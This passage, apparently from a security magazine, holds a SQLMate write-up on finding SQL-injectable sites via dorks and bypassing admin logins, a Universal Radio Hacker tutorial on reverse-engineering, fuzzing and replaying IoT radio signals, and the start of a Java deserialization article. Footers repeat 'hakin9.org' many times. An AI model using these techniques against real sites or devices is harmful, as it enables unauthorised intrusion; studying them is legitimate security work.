Let’s say you have a lot of hashes in a text file then you can simply the use the --list function of sqlmate as follows: 

 

SQLMate currently supports MD5, SHA1 and SHA2 hashes. There's no need to specify the hash type as SQLMate can 

detect it automatically. You can use the --hash option if you have a single hash to crack.  

  

SQLMate can also help you find the admin panel of a website by bruteforcing. SQLMate has a big list of 481 common 

admin panel paths. It also supports choosing a specific extension like php, html or asp which comes in handy if you 

know what kind of web technology the target website is using. You can use the --admin option to use this feature as 

follows:  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Dorks can be useful to target a specific vulnerability or product on a large scale. SQLMate has the ability to scrap fresh 

dorks as well. Just specify dumping level via --dump option and it will scrap and save dorks in a txt file for later use. 

Take a look at this example:  

 

Using --dump 1 will dump nearly 20 dorks so set the level anywhere between 1-184 as per your needs. 

 
Dorks are often used by black hats during cyber war to find weak targets and they can also be used to perform targeted 

attacks against a particular target. 

Just feed SQLMate a SQL injection dork via --dork option and it will find vulnerable sites for you using Google. 

After that, it will try to find their admin panels and bypass them with malicious SQL queries. 
Just like this:  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Setting up SQLMate  

 

Enter the following command in terminal to download SQLMate git clone  

https://github.com/UltimateHackers/sqlmate 

Then navigate to the SQLMate directory by entering this command:  
cd sqlmate

Now install the required modules:  
pip install -r requirements.txt

 

Now run SQLMate:  

python sqlmate  

  

Available command line options:  

 

Usage: 

sqlmate [-h] [--dork DORK] [--hash HASH] [--list <path>]  
 [--dump 1-184] [--admin URL] [--type PHP,ASP,HTML]  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Optional arguments: 

 
 -h, --help      show this help message and exit  
 --dork DORK      Supply a dork and let SQLMate do its thing  

 --hash HASH      'Crack' a hash in 5 secs  

 --list <path>     Import and crack hashes from a txt file  

 --dump 1-184     Get dorks. Specify dumping level. Level 1 = 20 dorks  

 --admin URL      Find admin panel of website  

 --type PHP,ASP,HTML  Choose extension to scan (Use with --admin option,  
       Default is all) 

If you want to contribute, feel free to open a pull request at SQLMate's github repo, and start an issue if you encounter 

a bug. 

For other queries, you can mail me at s0md3v@gmail.com or hit me at my twitter handle, @s0md3v.
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User Guide / Tutorial

Guide version: 1.0

Refers to URH version: 1.9.1

Contact: Johannes.Pohl90@gmail.com Andreas.Noack@hochschule-stralsund.de
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1 Introduction

1.1 Motivation

The Universal Radio Hacker (URH) is a tool for analyzing unknown wireless protocols. With the rise of Internet of 

Things (IoT) such protocols often appear in the wild. Many IoT devices operate on frequencies like 433.92 MHz or 

868.3 MHz and use proprietary protocols for communication. Reverse-engineering such protocols can be fascinating 

(»What does my fridge talk about?«) and reveal serious security leaks, e.g. when bypassing smart alarm systems and 

door locks.

So how can we join this game? Software Defined Radios (SDR) are the answer for this. Such devices allow sending 

and receiving on nearly arbitrary frequencies. Figure 1 shows two examples. Both devices cost about 200 euro.

HackRF One can send and receive on frequen-        (b) SDRplay RSP2pro can receive on frequencies

cies from 1 MHz to 6 GHz.    from 1 kHz to 2 GHz.

Figure 1: Two examples for Software Defined Radios.

Like the name suggests, SDRs need software to be properly operated. This is where the Universal Radio Hacker 
comes into play: It takes the samples from the SDR and transforms them into binary information (bits). But this is 

only the beginning: URH is designed to help you throughout the entire process of attacking the wireless communica-

tion of IoT devices. In the upcoming sections, you will learn how to use URH and reverse engineer wireless protocols 

in minutes.

1.2 Installation

URH runs on Linux, OSX and Windows and is easy to install. You can nd the latest installation instructions here:  

https://github.com/jopohl/urh#installation
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2 Device interaction

To get started with investigating a wireless signal we need to capture it with a Software Defined Radio. URH offers sup-

port for a wide range of common SDRs. In this section, you will learn how to configure your SDR and use it inside 

URH.

2.1 Configuring Devices

First, let's ensure that your device is enabled in Edit Options Device. You will see a list of supported devices, similar to 

what is shown in fig. 2a.

                       

(a) Device options tab.                                             (b) Health check native backend.

Figure 2: Configuring devices

If you select a device in the list, you can either enable/disable it via the Enabled checkbox. Disabling a device will 

prevent it from showing up in the device selection in the main program. Furthermore, you can choose between na-
tive and GNU Radio backend. More on this in the following sections.
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2.1.1 Native Backend

The native device backend should be used whenever possible. If native backend is greyed out for a device, there may be 

a library missing. You can check this by clicking the Health Check button. A dialog like the one shown in fig. 2b will 

pop up and give you more information about the status of native device backend. If you indeed miss a library, you can 

install it on your system. For example, install HackRF library on Ubuntu with sudo apt-get install libhackrf-

dev. After that, hit the Rebuild button at the bottom of the dialog.

2.1.2 GNU Radio Backend

As a fallback to the native backend, you can use GNU Radio to access your device. In order to do that, configure either 

the path to your Python 2 interpreter or (on Windows) the GNU Radio installation directory. Then, you get notified 

that GNU Radio backend is available and can choose it after selecting your desired device from the device list in fig. 2a.

2.2 Scanning the spectrum

Having configured our SDR, let’s start by scanning the wireless spectrum and find the center frequency of the device 

we want to attack. To open the spectrum analyzer, use File → Spectrum Analyzer, this will give you a dialog as shown 

in section 2.2.
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Figure 3: Spectrum Analyzer dialog.

Device settings can be made on the left. After starting the spectrum analyzer, you can watch how URH tunes your de-

vice to the desired parameters in the bottom left.

When spectrum analysis starts, you see the spectrum at the top right and a waterfall plot of the spectrum in the bottom 

right. Both views together give you a good impression of the spectrum and allow you to find the target frequency eas-

ily. To change the current frequency you can either use the spinbox on the left or click on the desired point in the spec-

trum. This way, you can navigate through the spectrum and visually find the desired frequency.

2.3 Recording a signal

Having found the target frequency, it is time to record a signal for later analysis. Open up the recording dialog via 

File→Record Signal and you will see that it saved your parameters from Spectrum Analyzer, so you can simply start 

the recording with the record button on the middle left. In fig. 4 recording is already running and a wireless remote 

control was pressed two times. You can clearly see the two signals in the preview on the right.
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Figure 4: Record signals in this dialog

Stop the recording with the stop button. After this, you can save the signal and make another recording or simply close 

the dialog. You will be asked if you want to save your current recording. Congratulations, you successfully recorded 

your first signal!

3 Interpretation

Having recorded a signal, URH adds it automatically to the Interpretation Tab (fig. 5). Before we explore this tab, let’s 

have a look at other ways of opening and importing a signal.

3.1 Importing a signal

Apart from recording, a signal can be added to Interpretation tab via File →Open. File ending determines how URH 

handles the signal. URH understands these file endings:

• .complex files with complex64 samples (32 Bit oat for I and Q, respectively). This is the default signal file for-

mat and will also be used in case the le has no ending at all.
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• .complex16u using two unsigned 8 Bit integers for I and Q

• .complex16s using two signed 8 Bit integers for I and Q

• .wav files can be imported, but must not be compressed, i.e., they should be PCM.

• .csv, e.g. from USB oscilloscope can be imported using a CSV wizard available with File →Import→ IQ sam-

ples from csv.

3.2 Signal editing

Having loaded a signal into Interpretation, it can be zoomed using the mouse wheel or context menu. Make a selection 

with the mouse and navigate via drag by holding the shift key. This can be changed with the checkbox Edit →Op-

tions→ Hold shift to drag.

Figure 5: Recorded signal gets automatically added to Interpretation tab.

Apart from these basic functions, URH has a powerful signal editor. After making a selection, use the context menu to:

• Copy/paste parts of the signal

• Delete the selection

• Crop to current selection, i.e., remove everything that is not selected

• Mute the selection, i.e., set the selected part to zero

• Create a new signal from the selection

• Assign a participant more on this in section 4.5

• Set noise level from selection

Using these features you can isolate interesting signal parts and fix noisy recordings.
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3.3 Replay signal and view signal details

With the button in the top of fig. 5 you can replay the captured signal. The button opens signal detail dialog (fig. 
6) where you can also edit the sample rate. This influences the displayed time in Interpretation and Analysis.

Figure 6: Signal detail dialog.

3.4 Demodulation

Demodulation is the process of converting the recorded sine waves into bits. URH does this automatically for you 

whenever you add a signal to Interpretation tab. You see the resulting bits right below the signal.

You can change the modulation type using the combobox on the left. Whenever you change the modulation type the 

demodulation parameters are newly detected by URH. You can disable this by clicking the Autodetect parameters but-

ton. Of course, you can fine tune the parameters by using the spinboxes.

The demodulation parameters are:

• Noise: Define which power must be surpassed to not be counted as noise.

• Bit Length: The sample length of a bit. You can find this out by selecting a pulse with minimum length and 

looking at the number of selected samples as shown in fig. 7a.

• Center: The center in demodulated view separates the ones from the zeros. To tune this value, either use the 

spinbox or change the Signal View from Analog to Demodulated (see fig. 7b) and move the center between the 

areas with the mouse.

• Error Tolerance: Fine tune how tolerant (in samples) the demodulation routine shall be against errors.

Note that these parameters are found automatically and only need to be changed manually in rare cases, e.g. bad sig-

nal recordings.
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               (a) Finding the bit length manually.                                     (b) Setting the center for demodulation.

Figure 7: Finding bit length and center visually.

In case of ASK demodulation, you can make advanced settings using the button next to the demodulation combobox.

3.5 Spectrogram

With the spectrogram view (fig. 8), you can view the frequency spectrum of your signal during time. Simply switch to 

this view via Signal View→ Spectrogram.

Figure 8: Spectrogram view for a signal.

The spectrogram view has three parameters:

1. FFT Window Size is the used STFT (Short-Time-Fourier-Transform) window size and determines the 

time resolution of the spectrogram.

2. Datamin is the minimal frequency magnitude for the spectrogram. All magnitudes below Datamin will be 

set to this value.

3. Datamax is the maximum frequency magnitude for the spectrogram. All magnitudes above Datamax will be 

set to this value.
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You can change the spectrogram appearance using Edit→Options→View.

3.6 Filters (advanced feature)

URH supports filters to get the most of your signals. There are two types of filters available: bandpass filter and mov-

ing average filter. We will see both filter types in the next two sections. Note, this is an advanced feature and not 

needed in most cases.

3.6.1 Bandpass filter

You can apply a bandpass filter in the spectrogram view (section 3.5) to a defined selection and separate channels from 

each other or correct misaligned signals. To do this, make a selection around your desired frequency band like in fig. 9.

Figure 9: Select your desired frequency range for filtering.

After that, right click on the spectrogram and select Create signal from frequency selection. A filtered signal will be 

created and added under the original signal. If you are not pleased with the result, try tuning the filter bandwidth us-

ing context menu and click Configure filter bandwidth... to make a configuration dialog appear. Here you can, for ex-

ample, increase accuracy of the filter by choosing a lower bandwidth.

3.6.2 Moving average filter

Have a look at the signal in fig. 10. The demodulation does not look good.

Figure 10: Signal with quantization errors.
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The reason for this is that there are quantization errors in the signal. This can either be fixed with better recording 

hardware or by clicking the filter button below the signal. This will improve demodulation results by applying a mov-

ing average filter to the signal. The filter can be fine tuned and customized using the little arrow on the right of the but-

ton and choosing Configure filter.... This opens the filter configuration dialog.

4 Analysis

In Interpretation phase, we demodulated a signal and transformed the sine waves into bits. But what do these bits 

mean? To find out, we need to perform protocol reverse engineering. URH supports this process with the Analysis tab 

(fig. 11). We will break down the various features of this tab in this section.

Figure 11: Analysis tab.

4.1 Getting data into analysis

Before we explore this tab in more detail, let’s see how you can get data into the Analysis tab. There are three ways:

1. From Interpretation tab: This is the default way. The bits from each signal you open in Interpretation 

tab will automatically be added to Analysis tab.

2. Load a .proto file: With the save button in the top right of the Analysis tab, you can save your protocol 

and load it again via File→Open.
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3. Load plain bits from .txt file: Got some bits lying around you want to make a quick analysis for? Just 

save your bits into a file that ends with .txt and open it via File→Open. Make sure your file only contains 

characters 1 and 0. This is also useful when your bits come from an external application.

4.2 Project files

A word of caution here: You already made some adjustments in the Interpretation tab and will probably do a lot more 

in Analysis tab. Your work will be lost when you close the program unless you create a project. You can convert your 

current work to a project any time via File→New Project. This will give you a dialog (fig. 12) for your new project.

Figure 12: Dialog for creating a new project. All your changes from a non-project will be transferred to the new project.

All you need to do is to choose a directory where your project shall be saved to. Furthermore, you can make some de-

fault settings for your project and add a description. You can also configure the participants (see section 4.5), such as a 

remote control or a smart home central that are investigated in this project. Although you create a new project, your 
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current work will be transferred, given that you are not already working on a project. If you want to make a fresh start, 

just close everything before creating a new project via File→Close all.

4.3 View data from different perspectives

Let’s start exploring the Analysis tab by looking at the top of it first as shown in fig. 13.

Figure 13: Top part of the Analysis tab.

All messages are aligned under each other in the center table for easy comparison. For convenience, you can mark dif-

ferences using the checkbox at the bottom left of fig. 13.

The top row above the table allows you to:

• Search for patterns in the data.

• View the Received Signal Strength Indicator, RSSI, of the selected message.

• View the absolute and relative timestamp for the selected message.

• Save the current protocol with the button on the right.

Right below the table, you see current selection in Bit, Hex and Decimal representation.

Now, let’s have a look at the left part of fig. 13. In the Protocols tab, you can define which protocols you want to see in 

the table. Simply uncheck a protocol to hide it. For a better structure, you can also create groups using the context 

menu and move your protocols around these groups using drag and drop or using the context menu. In the partici-

pants tab, you can hide messages from certain participants (see section 4.5).
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With the View data as combobox you can choose how the data in the table should be presented: Bit, Hex and ASCII 

view are supported. When opening the program, the view will default to the value set in Edit→Options→View Default 

View.

With the Configure decoding combobox, you can assign a decoding to the currently selected messages. You will learn 

more about decodings in section 4.4. Below this combobox you see how many errors occurred during decoding the se-

lected message.

The Analyze button at the bottom left of fig. 13 automates many Analysis steps. It can:

• Assign participants based on the RSSI of each message.

• Assign decodings based on the decoding errors for each message.

• Assign message types based on the configured rules described in section 4.7.

• Assign labels based on heuristics for protocol labels.

You can configure Analysis button behavior using the arrow on its right. Especially when assigning different partici-

pants to many messages, this button becomes useful.

4.4 Decoding

Wireless protocols may use sophisticated encodings to prevent transmission errors or increase their energy efficiency. 

While this is a great idea for designing good IoT protocols, it somehow hinders you from investigating the (true) trans-

mitted data.

4.4.1 Configure Decodings

Therefore, URH comes with a powerful decoding component. You can access it via Edit→Decoding from the main 

menu or by selecting ... as decoding in the Analysis tab. This will open the decoding dialog shown in fig. 14.

150

Universal Radio Hacker - Investigate Wireless Protocols Like A Boss

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


Figure 14: In the decoding dialog custom decodings can be crafted.

A decoding consists of (at least one) primitives that are chained together and processed based on their position in the 

list from top to bottom. You can add primitives by drag&drop.

You can preview the effect of your decoding with the fields in the lower area of the dialog. This way you can make ex-

periments without leaving the dialog.

4.4.2 External Decodings

Have a very tough encoding and can’t find a way to build it with the given primitives? No worries! You can program 

your decoding in your favored language and use it right in URH!

The interface for your external program is simple:

• Read the input as string (e.g., 11000) as command line argument

• Write the result to STDOUT
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You can learn more about external decodings in our GitHub wiki:  

https://github.com/jopohl/urh/wiki/Decodings#use-external-program.

4.4.3 Choose decoding

Save your new decoding with the Save as... button and it will be added to the list of available encodings in the Analysis 

tab. To apply your crafted decoding to your data, just select the messages you want to set it for ( for all) and use 
the Configure Decoding combobox in the Analysis tab.

4.5 Participants

Protocol reverse engineering gets really complicated when multiple participants are involved. For example, a wireless 

socket may be switched from a smart home central that is triggered by a remote control. To keep an overview, URH 

offers configurable participants. To use this feature, you need to create or load a project (section 4.2) and configure 

your participants via File→Project settings. Here, you will find the table from fig. 15.

Figure 15: Use this table in project settings to configure participants.

Use the and buttons right to the table to add or remove participants, respectively. You can configure name, short-
name and color of a participant to adapt it to your project. The relative RSSI will be used from URH to assign partici-

pants automatically when pressing the Analyze button (section 4.3). If you know the address of a participant, you can 

enter it here to help URH during automatic finding of labels when pressing the Analyze button.

To assign participants, you can either use Analyze button to do this automatically or use the context menu of the mes-

sage table as shown in fig. 16.
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Figure 16: Manually assign a participant to selected messages with context menu.

As shown in fig. 16, each row header gets the background color of the assigned participant of the respective message. 

Furthermore, the participant’s shortname is added behind the row number.

With the context menu, you can also show the current selection in Interpretation. This tight integration with Interpre-

tation allows you to find bit errors easily. Furthermore, the messages in Interpretation are also colored according to 

the assigned participants as shown in fig. 17.

Figure 17: Participants are also visualized in Interpretation.
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4.6 Labels

Messages of a protocol contain fields like Length, Address or Synchronization. During Analysis, you will reveal proto-

col fields one by one. To help you with this task, URH supports assigning labels to arbitrary parts of messages. These 

labels represent your current hypothesis for a field. You will learn how to master labels in this section.

4.6.1 Assigning and editing labels

To assign a label, simply select your desired range in message table and use context menu (right click)→Add protocol 

label. After adding a label, you can enter a name for it in the list view on the list view in bottom file (see fig. 18) or 

choose a predefined name based on the configured field types (section 4.6.2).

Figure 18: Assigned labels will be added to label list view and Wireshark-like preview.

Once the label is added, you notice three changes on Analysis tab:

• The according data in message table is colored in label color.

• The label is added to the label list on bottom left. You can also uncheck a label here to hide all ranges with this 

label from message table.

154

Universal Radio Hacker - Investigate Wireless Protocols Like A Boss

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


• When moving the selection in message table, you see the values of all labels for the current message in a 

Wireshark-like table view below the message table. You can configure the Display format here using the com-

bobox in the second column. Possible values are Bit, Hex, ASCII and Decimal.

In order to edit a label, simply right click on it either in message table or label list. This will open a new dialog, where 

you can edit name, start, end and color of each label.

4.6.2 Field Types

Field types can speed up the assigning of labels even further by defining default values for label names. Field type con-

figuration dialog can be opened either via context menu of label list view or Edit→Options→Fieldtypes. By default, the 

field types from fig. 19 are available.

Figure 19: Configure the field types you want to use.

You can add or remove field types with the buttons right to the table. All Captions will be available when adding new 

labels in Analysis and also considered in autocompletion when entering a label name. This way, you can spare your-

self from typing the same label names again and again for each new project.

The Default display type is the initial option for the Display format of the label preview table (bottom of fig. 18) when 

a new label with this field type is added.

The Function of a field type is mostly used internally by URH when it assigns labels automatically. The CHECKSUM 

function, however, is an exception, because it unlocks advanced functionality. Let’s explore this feature in the next sec-

tion.
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4.6.3 Checksum labels

If your protocol has checksums, URH can verify these for you. Simply assign a label with a field type that has CHECK-

SUM function configured and you will get instant feedback if the message’s checksum matches the expectation in the 

label preview table as shown in fig. 20.

Figure 20: Feedback about checksum.

You can configure the type of the checksum in the label detail dialog. This dialog can be opened using context menu of 

the label in label list view or message table. Whenever a checksum label is present in the set of labels, the checksum 

configuration as shown in fig. 21 will appear. Here you can define a CRC polynomial (generic category) or choose the 

Wireless Short Packet (WSP) checksum which is included by default.

Figure 21: Checksum configuration.
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In the generic category, you will always see a preview of your configured CRC so you have instant feedback when edit-

ing it. In the table at the bottom, you define for which ranges of the message the checksum shall be calculated. By de-

fault, these ranges exclude labels of type PREAMBLE and SYNC. Note, you can also add multiple ranges using the but-

ton when you have a more complicated checksum that excludes certain ranges.

4.7 Message Types

Message types take the label concept to the next level. Complex protocols tend to have different message types like ACK 

and DATA. By default, URH uses only one message type and applies configured labels to all messages based on their 

position only. With message types, you gain another level of control as you can configure labels per message type.

Message types can be added with the button next to the message type combobox right above the label list view. New 
message types will be bootstrapped with the labels from the default message type. You can assign message types to 

messages by selecting them in message table and use the context menu. This way, you can handle complex protocols 

like the one shown in fig. 11.

Figure 22: A more complex protocol with various message types.

Assigning message types manually can be tedious. Therefore, URH has a feature to assign message types auto-
matically based on rules. ou can configure these rules for a message type by clicking the highlighted button in fig. 22. 

This will pop up the rule configuration dialog. Configuring rules is straightforward using the shown table.
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Figure 23: Rules for automatic message type assignment can be configured in this dialog.

When hitting the Save and apply button, URH will close the dialog and apply the message types based on the rules. 

You can also enforce the update of automatically assigned message types using the context menu of the label list view.

5 Generation

So far we have demodulated wireless signals in Interpretation and reverse engineered protocol logic in Analysis. It is 

time to get the reward for this work and finally break a wireless protocol. This is exactly what the Generator tab (fig. 

24) is for.

Figure 24: Generator tab.
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You can add a protocol via drag&drop from the tree view on the right. As you see, all your labels from Analysis are 

transferred when doing this. The table is editable so you can manipulate the data. Furthermore, you can add columns 

or empty messages using the context menu of the table.

The Generator has also a special feature for checksum labels: It will automatically recalculate the checksum when-

ever you change message data. This way, you do not need to worry about the checksums when manipulating data. 

Moreover, a checksum label’s tooltip identifies whether the checksum is correct or not.

5.1 Fuzzing

While it is possible to edit messages by hand, it is much faster to let URH do the dirty work for us. This is the purpose 

of the fuzzing component. You can enter a range of values for a label you want to fuzz and just hit a button while URH 

takes care of the rest. Let’s see how this works.

Start by selecting your desired label in message table, then right click on it and choose Edit→fuzzing label. This will 

open the fuzzing dialog from fig. 25

Figure 25: With the fuzzing dialog, you can quickly add value ranges for labels.
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In this example, we fuzz the label data. The bold 10 indicates the original value for this message. In the center table, 

you define which values should be set for this label during fuzzing. With the buttons to the right of the table, you can 

add values manually( ), or remove ( ) and repeat ( ) selected values, respectively.

The controls at the bottom allow you to automate the adding of values in the following ways:

• Add a full range of values from Start to End, e.g. 0...255.

• Add boundaries only, e.g. {0, 1, 254, 255} for Start = 0 End = 255, Border Values = 2.

• Add random values from speci ed range.

When you are done, hit the Save and Close button and go to the Fuzzing tab in Generator as shown in fig. 26. Note, 

you configure the fuzzing settings per message so make sure you select the message you want to fuzz before making 

fuzzing settings. You see the number of fuzzing values behind the label name, in this case 256. Make sure you check 

the label you want to fuzz to activate it.

Figure 26: Fuzzing is as easy as clicking a button.

An active fuzzing label will be marked orange in the Generator table. Now everything is set up, just hit the Fuzz button 

and watch how URH generates all the messages. As can be seen from fig. 26 it also takes care of recalculating the check-

sum for each fuzzed message.
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By default, URH adds a pause of one mega sample before each fuzzed message. You can change this via Options Gen-

eration. Pauses between messages are itself configurable in the Pauses tab left to Fuzzing tab.

In case you want to fuzz different ranges within the same message, use the radio buttons next to the Fuzz button to se-

lect a mode to control how the values should be added:

• Successive: Fuzzed values are inserted one-by-one.

• Concurrent: Labels are fuzzed at the same time.

• Exhaustive: Fuzzed values are inserted in all possible combinations.

Note, you can save the current fuzzing profile with the save button at the top right corner.

5.2 Modulation

Now we have manipulated the data and can send it back to the air, right? Almost! It may be necessary to fine tune the 

modulation first. You can do this with the Edit button to the left of the generator table. Whenever you drop a protocol 

to Generator, URH will automatically determine reasonable modulation settings. Complicated modulations, how-

ever, may need some manual fine-tuning. The modulation dialog (fig. 27) that opens after clicking the Edit button 

helps you with this.

Figure 27: Fine-tune the modulation in the modulation dialog.
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Simply verify all settings from top to bottom in this dialog. Each time you make a change, the modulated preview will 

change. You can add an original signal via drag&drop from the tree view on the bottom and use the comboboxes to 

only show certain ranges that represent the customizable Data (raw bits). This way, you can visually verify your modu-

lation settings by comparing the modulation result to the original signal.

You can review modulation settings in the area left of the generator table (see fig. 26) so you do not need to open modu-

lation dialog for this.

Note, URH automatically applies the decoding chain (section 4.4) in reverted order before modulating the data, so you 

do not need to bother with encoding at this stage.

5.3 Sending it back

Having made all necessary configurations, it is time to generate data. URH will take care of applying the encoding and 

modulating the bits. You can either use Generate left button to save this to a .complex file or hit the Send data button 

to open the send dialog (fig. 28).

Figure 28: The send dialog will use the configured SDR to send out the data.
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You see the modulated data on the right of the dialog. You can also edit the signal before sending using the context 

menu, if required. On the left side, SDR related settings can be made. As soon as you hit the start button, send pro-

gress will be visualized in three ways. First, you see the current message in the progress bar on the right. Second, right 

below this, the current sample is shown. Third, in the graphic view on the right, an indicator will be drawn and up-

dated during sending.

Could you trigger an action on the target device? Welcome to the circle of IoT hackers!

6 Configuring Look and Feel

URH gives you a native look and feel regardless if you install it on Linux, Windows or OSX. However, if you would 

like to customize it, there are two fallback themes available. Figure 29 gives you an impression of how the three 

themes compare to each other on Windows.

(a) Native theme on Windows.

                         (b) Light theme.                                                       (c) Dark theme.

Figure 29: URH in the three different themes on Windows.
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You can configure the theme using Edit→Options→View→Choose application theme. Linux users can also configure 

icon theme. This allows using system icons instead of the bundled icon theme that come with URH. You can choose 

this via Edit→Options→View→Choose icon theme.

Note to KDE users: If you experience icon issues in file dialogs, it is necessary to switch the icon theme to native 

icon theme using Edit→Options→View→Choose icon theme.

7 Plugins

URH can be enhanced using plugins. To activate a plugin, simply check its checkbox using Edit→ Options→Plugins. In 

this section, you will find an overview of available plugins.

• ZeroHide: This plugin allows you to entirely crop long sequences of zeros in your protocol and focus on rele-

vant data. You can set a threshold below. All sequences of directly following zeros, which are longer than this 

threshold, will be removed. This will give you a new entry in Analysis message table context menu.

• RfCat: With this plugin, we support sending bytestreams via RfCat (e.g. using YARD Stick One). Therefore, a 

new button below generator table will be created.

• InsertSine: This plugin enables you to insert custom sine waves into your signal as shown in fig. 30. You will 

find a new context menu entry in Interpretation signal view. Transform URH into a full fledged signal editor!

• NetworkSDRInterface: With this plugin, you can interface external applications using TCP. You can use 

your external application for performing protocol simulation on logical level or advanced modulation/

decoding. If you activate this plugin, a new SDR will be selectable in device dialogs. Furthermore, a new button 

below generator table will be created.

• MessageBreak: This plugin enables you to break a protocol message on an arbitrary position. This is helpful 

when you have redundancy in your messages. This will give you a new entry in Analysis message table context 

menu.
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Figure 30: Insert arbitrary sine waves in Interpretation with the InsertSine plugin.

27

165

Universal Radio Hacker - Investigate Wireless Protocols Like A Boss

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


An Overview On 
Deserialization 
Vulnerabilities In 
Java Virtual 
Machine (JVM)

by João Filho Matos Figueiredo



167

ABOUT THE AUTHOR

João Filho Matos 
Figueiredo 

He is an Brazilian independent security researcher and developer, having noti-

fied critical vulnerabilities (ie remote code execution) affecting important prod-

ucts and companies, among them: Samsung.com, Blackberry.com, Oracle 

Cloud, U.S. Department of Defense (DoD) - multiples, Red Hat, banks, telecom-

munications companies, government and others. He also has bachelor's degree 

in Computer Science and a Master's Degree in Distributed Systems, both at 

the Federal University of Paraíba (UFPB), Brazil and is the author of the JexBoss 

security audit tool.



This paper discuss a persistent class of vulnerabilities [1] in Java (JVM) ecosystem applications and platforms - but 

not limited to this technology - which benefits from facilities provided by objects serialization / deserialization [2]. Ini-

tially, a brief introduction will be made on what it is and how objects deserialization work in Java Virtual Machine 

(JVM), followed by a history of its problems. The risks of this flexibility and the exploitations fundamentals will be pre-

sented through didactic examples, payloads explanations and customizations (based on of CVE-2015-7501 - apache 

commons-collections payload). The text continues with case studies from CVE-2017-7504 and CVE-2017-12149, con-

taining information that helps to identify similar scenarios and presents a payload (gadget chain) for validation 

through multiplatform reverse shell connection - in addition to a ‘Laboratory’ and a tool for tests automation. Finally, 

remediation measures are discussed.

NOTE: For didactic purposes, "Java" can be used in places where, technically, would be the appropriate JVM (Java 

Virtual Machine). Likewise, "unsafe deserialization" will sometimes be written simply as "deserialization".

The codes used in the examples, including the payload generators and the Lab that simulates a vulnerable web applica-

tion, as well as the use instructions, are available at github: https://github.com/joaomatosf/JavaDeserH2HC

The original version of this article in Brazilian Portuguese can be accessed at http://h2hc.com.br/revista

Introduction

Often applications need to establish communication between different components: either sending, receiving or stor-

ing "messages" for later retrieval. One of the quickest ways to implement these requirements is to use object serializa-

tion.

Serialization basically consists of taking an object and converting it (serializing it) into a format suitable for transmis-

sion (e.g. via sockets) or storage (e.g. in databases, files, etc.), so that this can be "rebuilt" (deserialized) later. Depend-

ing on the technology / language used, a native mechanism may be available (prioritizing performance and easiness 

over interoperability) or, alternatively, using open formats (e.g. JSON, XML) for object representation (in this case, 

generally from third-party libraries).

In Java (JVM), the native mechanism [2] is widely adopted: it "converts" objects to a corresponding byte stream (seri-

alization) and vice versa (deserialization) - it is just enough that the type (class) implements the Serializable or Exter-

nalizable interface. In addition, it is important to note that many protocols and features of the platform inherently de-

pend on this functionality, such as Remote Method Invocation (RMI) [3], Java Management eXtensions (JMX) [4], 

Java Message Service (JMS) [5] and Common Object Request Broker Architecture (CORBA) [6] - common in Java en-

vironments. 

Figure 1 illustrates an example where the "A" component on the left side serializes an object of Alien class and stores it 

in the "ET_object.ser" file. Subsequently, the "B" component on the right reads the file from the disk and proceeds 
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with deserialization. Notice the first two bytes in the stream header (bottom image), which contain the "magic num-

ber" \xAC\xED - identifying it as a serialized Java object.

Figure 1 - A Java object illustration of serialization, archive and deserialization 

NOTE: To get codes used in the examples, use: $ git clone https://github.com/joaomatosf/

